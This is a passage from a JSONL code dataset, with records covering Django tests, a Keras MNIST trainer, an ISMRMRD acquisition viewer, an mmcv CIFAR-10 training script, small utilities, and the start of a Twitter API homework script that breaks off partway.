&term2={term2}&submit=submit\".format(\n\tsite='http://54.183.42.206:8080/sigma/', jsp='Intersect.jsp',\n\tkb='SUMO', lang='EnglishLanguage',\n\tterm1='SubjectiveAssessmentAttribute', term2='disjoint')\n\nWN_ES = \"{site}{jsp}\"+ \"?\" + \"kb={kb}&term=WN30-{offset}\".format(\n\tsite='http://54.183.42.206:8080/sigma/', jsp='OWL.jsp',\n\toffset='107493527', kb='SUMO')\n","sub_path":"SUMO/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"563612907","text":"# -*- coding: utf-8 -*-\nfrom copy import deepcopy\nfrom unittest import TestCase\n\nfrom ship.exceptions import DuplicateError, NotFoundException\nfrom ship.storage import ShipDjangoStorage, ShipPureMemoryStorage\nfrom ship.logic import ShipLogic\n\n\nclass ShipLogicInterface:\n\n maxDiff = None\n\n ship_data = {\n 'name': 'GOODSHIP COTTON',\n 'imo_number': '1234567',\n 'user_id': 1,\n 'notes': None,\n }\n\n def tearDown(self):\n self.logic.storage.wipe()\n\n def test_create_ship(self):\n data = deepcopy(self.ship_data)\n actual = self.logic.create_ship(**data)\n\n self.assertTrue('id' in actual)\n del actual['id']\n\n self.assertTrue('created' in actual)\n del actual['created']\n\n self.assertTrue('modified' in actual)\n del actual['modified']\n\n self.assertEqual(actual['status'], 'ACTIVE')\n del actual['status']\n\n self.assertEqual(actual, self.ship_data)\n\n def test_create_ship_raises_duplicate_error(self):\n data = deepcopy(self.ship_data)\n self.logic.create_ship(**data)\n\n with self.assertRaises(DuplicateError):\n self.logic.create_ship(**data)\n\n def test_get_ships(self):\n data = deepcopy(self.ship_data)\n\n expected = self.logic.create_ship(**data)\n\n # We will create 10 additional ships that we don't expect to see\n # when we retrieve the ships by user_id later on.\n for index in range(9):\n data['imo_number'] = '765432{index}'.format(index=index)\n self.logic.create_ship(**data)\n\n # Create a ship for a different user that won't be returned when\n # retrieving ships\n data['user_id'] = 666\n self.logic.create_ship(**data)\n\n ships, total_count = self.logic.get_ships(\n user_ids=[self.ship_data['user_id']],\n order_by='-created',\n )\n\n self.assertEqual(total_count, 10)\n self.assertEqual(len(ships), 10)\n self.assertEqual(ships[0], expected)\n\n def test_update_ship(self):\n data = deepcopy(self.ship_data)\n ship = self.logic.create_ship(**data)\n\n expected = self.logic.update_ship(\n id=ship['id'],\n notes='Here are some fun notes',\n )\n\n ships, count = self.logic.get_ships(\n id=ship['id'],\n )\n self.assertEqual(count, 1)\n self.assertEqual(ships[0]['notes'], expected['notes'])\n\n def test_update_non_existent_ship_raises_not_found_exception(self):\n with self.assertRaises(NotFoundException):\n self.logic.update_ship(\n id=1234567889999,\n notes='Not found bud!'\n )\n\n def test_update_ship_user_id(self):\n data = deepcopy(self.ship_data)\n expected = self.logic.create_ship(**data)\n\n actual = self.logic.update_ship(\n id=expected['id'],\n user_id=1234,\n )\n\n self.assertEqual(actual['user_id'], expected['user_id'])\n\n def test_delete_ship(self):\n data = deepcopy(self.ship_data)\n ship = self.logic.create_ship(**data)\n\n actual = self.logic.delete_ship(ship['id'])\n self.assertEqual(actual['status'], 'DELETED')\n\n ships, count = self.logic.get_ships(id=ship['id'])\n self.assertEqual(count, 1)\n self.assertEqual(ships[0]['status'], 'DELETED')\n\n\nclass TestShipLogic_PureMemoryStorage(ShipLogicInterface, TestCase):\n\n storage = ShipPureMemoryStorage()\n logic = ShipLogic(storage)\n\n\nclass TestShipLogic_DjangoStorage(ShipLogicInterface, TestCase):\n\n storage = ShipDjangoStorage()\n logic = ShipLogic(storage)\n\n","sub_path":"ship/tests/test_ship_logic.py","file_name":"test_ship_logic.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"96450411","text":"__author__ = 'nicolasambin'\n\nimport unicodecsv\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n\n# we train the vectorizer on the whole corpus\ncorpus = []\nwith open('data/data_ateco.csv', 'r') as rf:\n reader = unicodecsv.DictReader(rf)\n for line in reader:\n terms_meta = ','.join(line['tf_meta_description'].split(';')) if line['tf_meta_description'] else ''\n terms_descr = ','.join(line['tf_meta_description'].split(';')) if line['tf_description_page'] else ''\n if terms_meta + terms_descr:\n corpus.append(terms_meta + terms_descr)\n\nvectorizer = TfidfVectorizer()\nm = vectorizer.fit(corpus)\n\n\ndef tfidf_normalize(wordslist):\n\n t = m.transform([' '.join(wordslist)])\n t_array = t.toarray()[0]\n\n names = m.get_feature_names()\n normalized_text = {}\n for i in set(wordslist):\n if i in names:\n normalized_text[i] = t_array[names.index(i)]\n else:\n normalized_text[i] = 1\n\n return normalized_text\n","sub_path":"tf_idf_normalization.py","file_name":"tf_idf_normalization.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"240556532","text":"import logging\n\nfrom PySide2 import QtWidgets, QtCore, QtGui\nfrom PySide2.QtCore import Qt\n\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.figure as figure\nfrom matplotlib.backends.backend_qt5agg import FigureCanvas\nfrom matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar\nfrom .utils import CachedDataset\n\nacquisition_header_fields = [\n ('version', 'Version', \"ISMRMRD Version\"),\n ('flags', 'Flags', \"Acquisition flags bitfield.\"),\n ('measurement_uid', 'UID', \"Unique ID for the measurement.\"),\n ('scan_counter', 'Scan Counter', \"Current acquisition number in the measurement.\"),\n ('idx.kspace_encode_step_1', 'Encode Step1', \"Encoding Counters\"),\n ('idx.kspace_encode_step_2', 'Encode Step2', \"Encoding Counters\"),\n ('idx.average', 'Average', \"Encoding Counters\"),\n ('idx.slice', 'Slice', \"Encoding Counters\"),\n ('idx.contrast', 'Contrast', \"Encoding Counters\"),\n ('idx.phase', 'Phase', \"Encoding Counters\"),\n ('idx.repetition', 'Repetition', \"Encoding Counters\"),\n ('idx.set', 'Set', \"Encoding Counters\"),\n ('idx.segment', 'Segment', \"Encoding Counters\"), ('acquisition_time_stamp', 'Acquisition Timestamp', \"Acquisition Timestamp\"),\n ('physiology_time_stamp', 'Physiology Timestamps', \"Physiology Timestamps (e.g. ecg, breathing, etc.)\"),\n ('number_of_samples', 'Samples', \"Number of samples acquired.\"),\n ('available_channels', 'Available Channels', \"Number of available channels.\"),\n ('active_channels', 'Active Channels', \"Number of channels currently active.\"),\n ('channel_mask', 'Channel Mask', \"A binary mask indicating which channels are active.\"),\n ('discard_pre', 'Prefix Discard', \"Samples to be discarded at the beginning of the acquisition.\"),\n ('discard_post', 'Postfix Discard', \"Samples to be discarded at the end of the acquisition.\"),\n ('center_sample', 'Center Sample', \"Sample at the center of k-space.\"),\n ('encoding_space_ref', 'Encoding Space', \"Acquisition encoding space reference.\"),\n ('trajectory_dimensions', 'Trajectory Dimensions', \"Dimensionality of the trajectory vector.\"),\n ('sample_time_us', 'Sample Time', \"Time between samples (in microseconds), sampling BW.\"),\n ('position', 'Position', \"Three-dimensional spacial offsets from isocenter.\"),\n ('read_dir', 'Read Direction', \"Directional cosines of the readout/frequency encoding.\"),\n ('phase_dir', 'Phase Direction', \"Directional cosines of the phase.\"),\n ('slice_dir', 'Slice Direction', \"Directional cosines of the slice direction.\"),\n ('patient_table_position', 'Patient Table', \"Patient table off-center.\"),\n ('idx.user', 'User Idx', \"Encoding Counters\"),\n ('user_int', 'User Integers', \"Free user parameters.\"),\n ('user_float', 'User Floats', \"Free user parameters.\")\n]\n\n\n\nclass AcquisitionModel(QtCore.QAbstractTableModel):\n\n def __init__(self, container):\n super().__init__()\n self.acquisitions = CachedDataset(container.acquisitions)\n\n self.data_handlers = {\n 'idx.kspace_encode_step_1': self.__encoding_counters_handler,\n 'idx.kspace_encode_step_2': self.__encoding_counters_handler,\n 'idx.average': self.__encoding_counters_handler,\n 'idx.slice': self.__encoding_counters_handler,\n 'idx.contrast': self.__encoding_counters_handler,\n 'idx.phase': self.__encoding_counters_handler,\n 'idx.repetition': self.__encoding_counters_handler,\n 'idx.set': self.__encoding_counters_handler,\n 'idx.segment': self.__encoding_counters_handler,\n 'idx.user': self.__user_encoding_counters_handler,\n 'physiology_time_stamp': self.__array_handler,\n 'channel_mask': self.__array_handler,\n 'position': self.__array_handler,\n 'read_dir': self.__array_handler,\n 'phase_dir': self.__array_handler,\n 'slice_dir': self.__array_handler,\n 'patient_table_position': self.__array_handler,\n 'user_int': self.__array_handler,\n 'user_float': self.__array_handler\n }\n\n def rowCount(self, _=None):\n return len(self.acquisitions)\n\n def columnCount(self, _=None):\n return len(acquisition_header_fields)\n\n def headerData(self, section, orientation, role=Qt.DisplayRole):\n\n if orientation == Qt.Orientation.Vertical:\n return None\n\n _, header, tooltip = acquisition_header_fields[section]\n\n if role == Qt.DisplayRole:\n return header\n if role == Qt.ToolTipRole:\n return tooltip\n\n return None\n\n def data(self, index, role=Qt.DisplayRole):\n attribute, _, tooltip = acquisition_header_fields[index.column()]\n\n if role == Qt.DisplayRole:\n acquisition = self.acquisitions[index.row()]\n handler = self.data_handlers.get(attribute, lambda acq, attr: getattr(acq, attr))\n return handler(acquisition, attribute)\n if role == Qt.ToolTipRole:\n return tooltip\n\n return None\n\n def num_coils(self):\n return self.acquisitions[0].active_channels\n\n def __array_handler(self, acquisition,attribute):\n array = getattr(acquisition,attribute)\n return ', '.join([str(item) for item in array])\n\n @staticmethod\n def __encoding_counters_handler(acquisition, attribute):\n return getattr(acquisition.idx,attribute[4:])\n\n @staticmethod\n def __user_encoding_counters_handler(acquisition, attribute):\n array = getattr(acquisition.idx, attribute[4:])\n return ', '.join([str(item) for item in array])\n\n\nclass AcquisitionTable(QtWidgets.QTableView):\n selection_changed = QtCore.Signal()\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def selectionChanged(self, selected, deselected):\n super().selectionChanged(selected, deselected)\n\n self.selection_changed.emit()\n\n\nclass AcquisitionControlGUI(QtWidgets.QWidget):\n\n def __init__(self,num_channels):\n super().__init__()\n layout = QtWidgets.QHBoxLayout()\n self.data_processing = QtWidgets.QComboBox()\n self.data_processing.addItem(\"Mag./Phase\", userData={\"names\": (\"Magnitude\", \"Phase\"),\n \"transform\": lambda x: (np.abs(x), np.angle(x))})\n self.data_processing.addItem(\"Real/Imag\", userData={\"names\": (\"Real\", \"Imag.\"),\n \"transform\": lambda x: (np.real(x), np.imag(x))})\n layout.addWidget(self.data_processing)\n\n self.channel_selector = QtWidgets.QComboBox()\n self.__set_num_channels(num_channels)\n layout.addWidget(self.channel_selector)\n\n self.setLayout(layout)\n\n def __set_num_channels(self, num_channels):\n for i in range(self.channel_selector.count()):\n self.channel_selector.removeItem(i)\n\n for idx in range(num_channels):\n self.channel_selector.addItem(\"Channel \" + str(idx), userData={\"selector\": lambda x, i=idx : x[:, i:i + 1],\n \"labeler\": lambda scan, coil: str(scan)})\n\n self.channel_selector.addItem(\"All Channels\", userData={\"selector\": lambda x: x,\n \"labeler\": lambda scan, coil: str((scan, coil))})\n\n def label(self, scan, coil):\n return self.channel_selector.currentData()[\"labeler\"](scan, coil)\n\n def axes_titles(self):\n return self.data_processing.currentData()[\"names\"]\n\n def transform_acquisition(self, acq):\n return self.data_processing.currentData()[\"transform\"](self.channel_selector.currentData()[\"selector\"](acq))\n\n\nclass AcquisitionPlotter(FigureCanvas):\n\n def __init__(self):\n\n self.figure = mpl.figure.Figure()\n self.axis = self.figure.subplots(2, 1, sharex='col')\n self.figure.subplots_adjust(hspace=0)\n\n self.legend = mpl.legend.Legend(self.figure, [], [])\n self.figure.legends.append(self.legend)\n super().__init__(self.figure)\n\n def clear(self):\n for ax in self.axis:\n ax.clear()\n\n def plot(self, acquisitions, formatter, labeler):\n\n for acquisition in acquisitions:\n acquisition1, acquisition2 = formatter(acquisition)\n x_step = acquisition.sample_time_us\n x_scale = np.arange(0, acquisition1.shape[0] * x_step, x_step)\n for coil, acq1 in enumerate(acquisition1.T):\n self.axis[0].plot(x_scale, acq1, label=labeler(acquisition.scan_counter, coil))\n self.axis[1].plot(x_scale, acquisition2)\n\n handles, labels = self.axis[0].get_legend_handles_labels()\n self.legend = mpl.legend.Legend(self.figure, handles, labels)\n self.figure.legends[0] = self.legend\n\n self.figure.canvas.draw()\n\n def set_titles(self, titles):\n for ax, title in zip(self.axis, titles):\n ax.set_title(title, loc=\"right\", pad=-10)\n\n\nclass AcquisitionViewer(QtWidgets.QSplitter):\n\n def __init__(self, container):\n super().__init__()\n\n self.model = AcquisitionModel(container)\n\n self.acquisitions = AcquisitionTable(self)\n self.acquisitions.setModel(self.model)\n self.acquisitions.setAlternatingRowColors(True)\n self.acquisitions.resizeColumnsToContents()\n self.acquisitions.selection_changed.connect(self.selection_changed)\n self.acquisitions.pressed.connect(self.mouse_clicked)\n\n self.setOrientation(Qt.Vertical)\n\n self.canvas = AcquisitionPlotter()\n\n self.bottom_view = QtWidgets.QSplitter()\n self.acquisition_gui = AcquisitionControlGUI(self.model.num_coils())\n self.bottom_view.addWidget(self.acquisition_gui)\n self.acquisition_gui.data_processing.currentIndexChanged.connect(self.selection_changed)\n self.acquisition_gui.channel_selector.currentIndexChanged.connect(self.selection_changed)\n\n self.addWidget(self.acquisitions)\n self.addWidget(self.canvas)\n self.addWidget(self.bottom_view)\n\n self.navigation_toolbar = NavigationToolbar(self.canvas, self.bottom_view)\n self.bottom_view.addWidget(self.navigation_toolbar)\n\n self.setStretchFactor(0, 6)\n self.setStretchFactor(1, 1)\n\n def table_clicked(self, index):\n acquisition = self.model.acquisitions[index.row()]\n self.plot([acquisition])\n\n def format_data(self, acq):\n return self.acquisition_gui.transform_acquisition(acq.data.T)\n\n def selection_changed(self):\n self.canvas.clear()\n self.canvas.set_titles(self.acquisition_gui.axes_titles())\n\n indices = set([idx.row() for idx in self.acquisitions.selectedIndexes()])\n acquisitions = [self.model.acquisitions[idx] for idx in\n indices]\n self.canvas.plot(acquisitions, self.format_data, self.acquisition_gui.label)\n\n def mouse_clicked(self, index):\n if not QtGui.QGuiApplication.mouseButtons() & Qt.RightButton:\n return\n menu = QtWidgets.QMenu(self)\n DeleteAction = QtWidgets.QAction('Delete', self)\n y = index.column()\n DeleteAction.triggered.connect(lambda: self.acquisitions.hideColumn(y))\n menu.addAction(DeleteAction)\n menu.popup(QtGui.QCursor.pos())\n\n # SortAction = QtWidgets.QAction('Sort', self)\n # menu.addAction(SortAction)\n menu.popup(QtGui.QCursor.pos())\n","sub_path":"ismrmrdviewer/viewer/AcquisitionViewer.py","file_name":"AcquisitionViewer.py","file_ext":"py","file_size_in_byte":11575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"33541207","text":"\"\"\"Finds the first ten digits of the sum of the following one-hundred 50-digit numbers.\"\"\"\n\nimport sys\n\ncounter = 0\nwith open(\"input.txt\",\"r\") as f:\n for line in f:\n print(counter)\n counter += int(line.strip(\"\\n\"))\n\nprint(str(counter)[0:10])\n","sub_path":"ProjectEuler/Problem13/large_sum.py","file_name":"large_sum.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"131844225","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 15 13:06:13 2017\n\n@author: hasnat\nPurpose: Implementation of CNN model from caffe-face for MNIST classification.\nhttps://github.com/ydwen/caffe-face/tree/caffe-face/mnist_example\n\"\"\"\n\nfrom keras.models import Model, Input\nfrom keras.layers import Dense, Dropout, Flatten, Lambda\nfrom keras.layers import Conv2D, MaxPooling2D, PReLU\nfrom keras import backend as K\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.optimizers import SGD\nfrom keras.regularizers import l2 # L2-regularisation\nfrom keras.utils import np_utils\nfrom keras.utils.io_utils import HDF5Matrix\nfrom keras.initializers import RandomNormal, Constant\n\nimport numpy as np\n\ndef do_conv_act(x, n_op, k_size, st_size, input_shape=None, k_init='glorot_uniform', k_reg=None, bias_use=True, padtype='same'): \n # Convolution\n if input_shape is not None:\n x = Conv2D(n_op, kernel_size=(k_size, k_size), strides=(st_size, st_size), \n padding=padtype, input_shape=input_shape, use_bias=bias_use, \n kernel_initializer=k_init, kernel_regularizer=k_reg)(x)\n else:\n x = Conv2D(n_op, kernel_size=(k_size, k_size), strides=(st_size, st_size), \n padding=padtype, use_bias=bias_use,\n kernel_initializer=k_init, kernel_regularizer=k_reg)(x)\n \n # Nonlinear activation\n x = PReLU()(x)\n \n return x\n\ndef do_pool(x, sz):\n return MaxPooling2D(pool_size=(sz, sz))(x)\n\ndef rn_(stdval):\n return RandomNormal(stdval)\n\nbatch_size = 100\nnb_classes = 10\nepochs = 6\n\nnumTrSamp = 60000\n# numTrSamp = 500\nnumSampToLoadOnce = batch_size*200\ngl_wd = 0.0005\n\n# input image dimensions\nimg_rows, img_cols = 28, 28\n\npath_train = 'mnist_train.h5'\nX_test = HDF5Matrix('mnist_test.h5', 'X')\nY_test = HDF5Matrix('mnist_test.h5', 'y')\nY_labels = np.asarray(Y_test) \n# input image dimensions\nimg_rows = X_test.shape[1]\nimg_cols = X_test.shape[2]\n\ninput_shape = (img_rows, img_cols, 1)\n\nX_test = (np.asarray(X_test, dtype='float32') - 127.5) * 0.0078125 \nX_test = np.expand_dims(X_test, 3)\nY_test = np_utils.to_categorical(Y_test, nb_classes)\n\n# Define Model \nimg_input = Input(shape=input_shape)\n\nc1 = do_conv_act(img_input, 32, k_size=5, st_size=1, input_shape=input_shape, k_reg=l2(gl_wd), padtype='same')\nc2 = do_conv_act(c1, 32, k_size=5, st_size=1, k_reg=l2(gl_wd), padtype='same')\np1 = do_pool(c2, 2)\n\nc3 = do_conv_act(p1, 64, k_size=5, st_size=1, k_reg=l2(gl_wd), padtype='same')\nc4 = do_conv_act(c3, 64, k_size=5, st_size=1, k_reg=l2(gl_wd), padtype='same')\np2 = do_pool(c4, 2)\n\nc5 = do_conv_act(p2, 128, k_size=5, st_size=1, k_reg=l2(gl_wd), padtype='same')\nc6 = do_conv_act(c5, 128, k_size=5, st_size=1, k_reg=l2(gl_wd), padtype='same')\np3 = do_pool(c6, 2)\n\nflat = Flatten()(p3)\n\nfc1 = Dense(3, kernel_regularizer=l2(gl_wd), use_bias=False)(flat)\nact_1 = PReLU()(fc1)\n\nbn1 = BatchNormalization()(act_1)\nl2_fc1 = Lambda(lambda x: K.l2_normalize(x, axis=1))(bn1)\nscale_l2 = Lambda(lambda x: x*1)(l2_fc1)\n \nfc_cl = Dense(nb_classes, activation='softmax')(scale_l2)\n\nmodel = Model(inputs=img_input, outputs = fc_cl)\n\n# Set the optimizer\nsgd = SGD(lr=0.01, decay=0, momentum=0.9, nesterov=False)\n\nmodel.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\n\nmodel.summary()\n\n\n# Start training \nmulsteplr = [3, 5, 7]\nmulstepCnt = 0\nfor j in range(max(mulsteplr)):\n#for j in range(epochs): \n st = 0\n ed = st + numSampToLoadOnce\n \n while st < numTrSamp:\n print('== Global Epoch: '+ str(j) +' , LR:: '+ str(K.get_value(sgd.lr)) + ' ==')\n if ed>numTrSamp:\n ed = numTrSamp\n \n if(ed-st < batch_size):\n st = ed-1\n continue\n\n print('Data extracting from big matrix ...')\n X_train = HDF5Matrix(path_train, 'X', start=st, end=ed)\n Y_train = HDF5Matrix(path_train, 'y', start=st, end=ed) \n\n # Preprocess data\n X_train = (np.asarray(X_train, dtype='float32') - 127.5) * 0.0078125 \n X_train = np.expand_dims(X_train, 3)\n Y_train = np_utils.to_categorical(Y_train, nb_classes)\n \n print('Fitting model ...')\n model.fit(X_train, Y_train, batch_size=batch_size, shuffle='batch', nb_epoch=1, verbose=1, validation_data=(X_test, Y_test))\n \n # update indices\n st = ed\n ed = st + numSampToLoadOnce \n \n # decrease learning rate\n if(j>=mulsteplr[mulstepCnt]):\n print(str(j) + ':: Decreasing learning rate')\n K.set_value(sgd.lr, 0.8 * K.get_value(sgd.lr))\n mulstepCnt = mulstepCnt + 1\n \n submodel = Model(inputs=img_input, outputs = l2_fc1) \n points3D = submodel.predict(X_test)\n np.savez('points3D_l2sm_'+str(j), X=points3D, y=Y_labels)","sub_path":"cnn/keras_mnist_mod.py","file_name":"keras_mnist_mod.py","file_ext":"py","file_size_in_byte":4846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"495285227","text":"from django.conf.urls import url, include\nfrom myproject.core import views as c\n\ncustomer_patterns = [\n url(r'^$', c.customer_list, name='customer_list'),\n url(r'^add/$', c.customer_add, name='customer_add'),\n url(r'^save/$', c.customer_save, name='customer_save'),\n]\n\nperson_patterns = [\n url(r'^$', c.person_list, name='person_list'),\n url(r'^add/$', c.person_create, name='person_add'),\n]\n\nurlpatterns = [\n url(r'^$', c.home, name='home'),\n url(r'^customer/', include(customer_patterns)),\n url(r'^person/', include(person_patterns)),\n]\n","sub_path":"myproject/core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"434234684","text":"import logging\nimport os\nimport sys\nfrom argparse import ArgumentParser\nfrom collections import OrderedDict\n\nimport torch\nimport torch.distributed as dist\nimport torch.multiprocessing as mp\nimport torch.nn.functional as F\nimport torch.utils.data\nfrom mmcv import Config\nfrom mmcv.runner import Runner, DistSamplerSeedHook\nfrom torch.nn.parallel import DataParallel, DistributedDataParallel\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.distributed import DistributedSampler\nfrom torchvision import datasets, transforms\n\nimport custom_datasets\nimport models.custom\nimport models.mobilenet\nimport models.mobilenetv2\nimport models.resnet_cifar\nimport models.wide_resnet\n\nimport mmcv\nimport os.path as osp\nimport shutil\n\n\ndef deep_recursive_obj_from_dict(info):\n \"\"\"Initialize an object from dict.\n\n The dict must contain the key \"type\", which indicates the object type, it\n can be either a string or type, such as \"list\" or ``list``. Remaining\n fields are treated as the arguments for constructing the object.\n\n Args:\n info (dict): Object types and arguments.\n parent (:class:`module`): Module which may containing expected object\n classes.\n default_args (dict, optional): Default arguments for initializing the\n object.\n\n Returns:\n any type: Object built from the dict.\n \"\"\"\n assert isinstance(info, dict) and 'type' in info\n # TODO: This does not support object dicts nested in non-object dicts.\n args = info.copy()\n obj_type = args.pop('type')\n if mmcv.is_str(obj_type):\n if obj_type in sys.modules:\n obj_type = sys.modules[obj_type]\n else:\n # Assume the last part is a function/member name.\n elems = obj_type.split('.')\n module, attr = '.'.join(elems[:-1]), elems[-1]\n obj_type = getattr(sys.modules[module], attr)\n elif not isinstance(obj_type, type):\n raise TypeError('type must be a str or valid type, but got {}'.format(\n type(obj_type)))\n evaluated_args = {}\n for argname, argval in args.items():\n print(argname, type(argval))\n if isinstance(argval, dict) and 'type' in argval:\n evaluated_args[argname] = deep_recursive_obj_from_dict(argval)\n elif type(argval) == list or type(argval) == tuple:\n # Transform each dict in the list, else simply append.\n transformed_list = []\n for elem in argval:\n if isinstance(elem, dict):\n transformed_list.append(deep_recursive_obj_from_dict(elem))\n else:\n transformed_list.append(elem)\n evaluated_args[argname] = type(argval)(transformed_list)\n else:\n evaluated_args[argname] = argval\n print(obj_type)\n return obj_type(**evaluated_args)\n\ndef accuracy(output, target, topk=(1, )):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n with torch.no_grad():\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\n\ndef batch_processor(model, data, train_mode):\n img, label, logits = data\n label = label.cuda(non_blocking=True)\n logits = logits.cuda(non_blocking=True)\n pred = model(img)\n if len(logits.size()) > 1:\n loss = F.kl_div(F.log_softmax(pred, 1), F.softmax(logits, 1))\n else:\n loss = F.cross_entropy(pred, label)\n acc_top1, acc_top5 = accuracy(pred, label, topk=(1, 5))\n log_vars = OrderedDict()\n log_vars['loss'] = loss.item()\n log_vars['acc_top1'] = acc_top1.item()\n log_vars['acc_top5'] = acc_top5.item()\n outputs = dict(loss=loss, log_vars=log_vars, num_samples=img.size(0))\n return outputs\n\n\ndef get_logger(log_level):\n logging.basicConfig(\n format='%(asctime)s - %(levelname)s - %(message)s', level=log_level)\n logger = logging.getLogger()\n return logger\n\n\ndef init_dist(backend='nccl', **kwargs):\n if mp.get_start_method(allow_none=True) is None:\n mp.set_start_method('spawn')\n rank = int(os.environ['RANK'])\n num_gpus = torch.cuda.device_count()\n torch.cuda.set_device(rank % num_gpus)\n dist.init_process_group(backend=backend, **kwargs)\n\n\ndef parse_args():\n parser = ArgumentParser(description='Train CIFAR-10 classification')\n parser.add_argument('config', help='train config file path')\n parser.add_argument(\n '--launcher',\n choices=['none', 'pytorch'],\n default='none',\n help='job launcher')\n parser.add_argument('--local_rank', type=int, default=0)\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n\n cfg = Config.fromfile(args.config)\n\n logger = get_logger(cfg.log_level)\n\n # init distributed environment if necessary\n if args.launcher == 'none':\n dist = False\n logger.info('Disabled distributed training.')\n else:\n dist = True\n init_dist(**cfg.dist_params)\n world_size = torch.distributed.get_world_size()\n rank = torch.distributed.get_rank()\n if rank != 0:\n logger.setLevel('ERROR')\n logger.info('Enabled distributed training.')\n\n # build datasets and dataloaders\n train_dataset = deep_recursive_obj_from_dict(cfg.data.train)\n val_dataset = deep_recursive_obj_from_dict(cfg.data.val)\n if dist:\n num_workers = cfg.data_workers\n assert cfg.batch_size % world_size == 0\n batch_size = cfg.batch_size // world_size\n train_sampler = DistributedSampler(train_dataset, world_size, rank)\n val_sampler = DistributedSampler(val_dataset, world_size, rank)\n shuffle = False\n else:\n num_workers = cfg.data_workers * len(cfg.gpus)\n batch_size = cfg.batch_size\n train_sampler = None\n val_sampler = None\n shuffle = True\n train_loader = DataLoader(\n train_dataset,\n batch_size=batch_size,\n shuffle=shuffle,\n sampler=train_sampler,\n num_workers=num_workers)\n val_loader = DataLoader(\n val_dataset,\n batch_size=batch_size,\n shuffle=False,\n sampler=val_sampler,\n num_workers=num_workers)\n\n # build model\n model = deep_recursive_obj_from_dict(cfg.model)\n if dist:\n model = DistributedDataParallel(\n model.cuda(), device_ids=[torch.cuda.current_device()])\n else:\n model = DataParallel(model, device_ids=cfg.gpus).cuda()\n\n # build runner and register hooks\n runner = Runner(\n model,\n batch_processor,\n cfg.optimizer,\n cfg.work_dir,\n log_level=cfg.log_level)\n runner.register_training_hooks(\n lr_config=cfg.lr_config,\n optimizer_config=cfg.optimizer_config,\n checkpoint_config=cfg.checkpoint_config,\n log_config=cfg.log_config)\n if dist:\n runner.register_hook(DistSamplerSeedHook())\n\n # load param (if necessary) and run\n if cfg.get('resume_from') is not None:\n runner.resume(cfg.resume_from)\n elif cfg.get('load_from') is not None:\n runner.load_checkpoint(cfg.load_from)\n\n # Create work_dir if necessary and copy config file.\n if mmcv.is_str(cfg.work_dir):\n work_dir = osp.abspath(cfg.work_dir)\n mmcv.mkdir_or_exist(work_dir)\n shutil.copy(args.config, work_dir)\n\n runner.run([train_loader, val_loader], cfg.workflow, cfg.total_epochs)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"examples/train_cifar10.py","file_name":"train_cifar10.py","file_ext":"py","file_size_in_byte":7706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"159320102","text":"import unittest\nimport tweepy\nimport requests\nimport json\nimport twitter_info\n\n## SI 206 - HW\n## COMMENT WITH:\n## Your section day/time: 003, Thursday 8:30-9:3-0 am\n## Any names of people you worked with on this assignment:\n\n\n## Write code that uses the tweepy library to search for tweets with three different phrases of the \n## user's choice (should use the Python input function), and prints out the Tweet text and the \n## created_at value (note that this will be in GMT time) of the first FIVE tweets with at least \n## 1 blank line in between each of them, e.g.\n\n\n## You should cache all of the data from this exercise in a file, and submit the cache file \n## along with your assignment. \n\n## So, for example, if you submit your assignment files, and you have already searched for tweets \n## about \"rock climbing\", when we run your code, the code should use CACHED data, and should not \n## need to make any new request to the Twitter API. But if, for instance, you have never \n## searched for \"bicycles\" before you submitted your final files, then if we enter \"bicycles\" \n## when we run your code, it _should_ make a request to the Twitter API.\n\n## Because it is dependent on user input, there are no unit tests for this -- we will \n## run your assignments in a batch to grade them!\n\n## We've provided some starter code below, like what is in the class tweepy examples.\n\n##SAMPLE OUTPUT\n## See: https://docs.google.com/a/umich.edu/document/d/1o8CWsdO2aRT7iUz9okiCHCVgU5x_FyZkabu2l9qwkf8/edit?usp=sharing\n\n\n\n## **** For extra credit, create another file called twitter_info.py that \n## contains your consumer_key, consumer_secret, access_token, and access_token_secret, \n## import that file here. Do NOT add and commit that file to a public GitHub repository.\n\n## **** If you choose not to do that, we strongly advise using authentication information \n## for an 'extra' Twitter account you make just for this class, and not your personal \n## account, because it's not ideal to share your authentication information for a real \n## account that you use frequently.\n\n## Get your secret values to authenticate to Twitter. You may replace each of these \n## with variables rather than filling in the empty strings if you choose to do the secure way \n## for EC points\nconsumer_key = twitter_info.consumer_key\nconsumer_secret = twitter_info.consumer_secret\naccess_token = twitter_info.access_token\naccess_token_secret = twitter_info.access_token_secret\n## Set up your authentication to Twitter\nauth = tweepy.OAuthHandler(consumer_key, 